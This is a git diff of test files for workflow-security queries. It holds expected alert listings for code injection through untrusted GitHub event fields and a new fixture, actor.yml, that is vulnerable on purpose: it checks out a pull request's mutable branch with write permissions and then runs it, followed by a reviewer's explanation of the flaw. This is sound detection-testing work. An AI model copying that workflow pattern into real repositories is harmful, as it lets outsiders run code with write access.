| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref new file mode 100644 index 000000000000..9af8ec0f9ab1 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected similarity index 74% rename from ql/test/query-tests/Security/CWE-094/CodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e47c6dd340cb..298c4ce75a48 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | 
@@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -256,8 +260,31 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref new file mode 100644 index 000000000000..f7ce5674994d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref deleted file mode 100644 index fbd758b6bd62..000000000000 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref +++ /dev/null 
@@ -1 +0,0 @@
-Security/CWE-094/PrivilegedCodeInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml
new file mode 100644
index 000000000000..0913ac8bbcfc
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml
@@ -0,0 +1,21 @@
+name: Actor
+
+on: pull_request
+
+permissions:
+ contents: write
+
+jobs:
+ template-oss:
+ name: test
+ if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: |
+ ./cmd
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref
deleted file mode 100644
index 21d37e957a1c..000000000000
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref
+++ /dev/null
@@ -1,2 +0,0 @@
-Security/CWE-829/ArtifactPoisoning.ql
-
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
similarity index 73%
rename from ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected
rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
index 2819bf62fdf6..a792da279005 100644
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
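Review bot: The new actor.yml fixture carries no comment saying which alert it is expected to raise, and the TOCTOU it models deserves to be spelled out for whoever maintains the CWE-367 tests: the `if:` gate on `github.actor == 'dependabot[bot]'` is evaluated once, but the checkout then pins `github.event.pull_request.head.ref` — a mutable branch name — rather than the commit `head.sha`, so the tree that `./cmd` executes under `contents: write` can differ from what existed when the condition was checked. I would add a header comment above `name: Actor` along the lines of `# Expected: flagged — actor-gated job checks out mutable head.ref and runs it; head.sha is the stable reference`. Whether the query also treats the `github.actor` comparison itself as an insufficient trust signal is not visible from this fixture; if it does, a sibling fixture that checks out `head.sha` would make clear which of the two conditions drives the finding.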
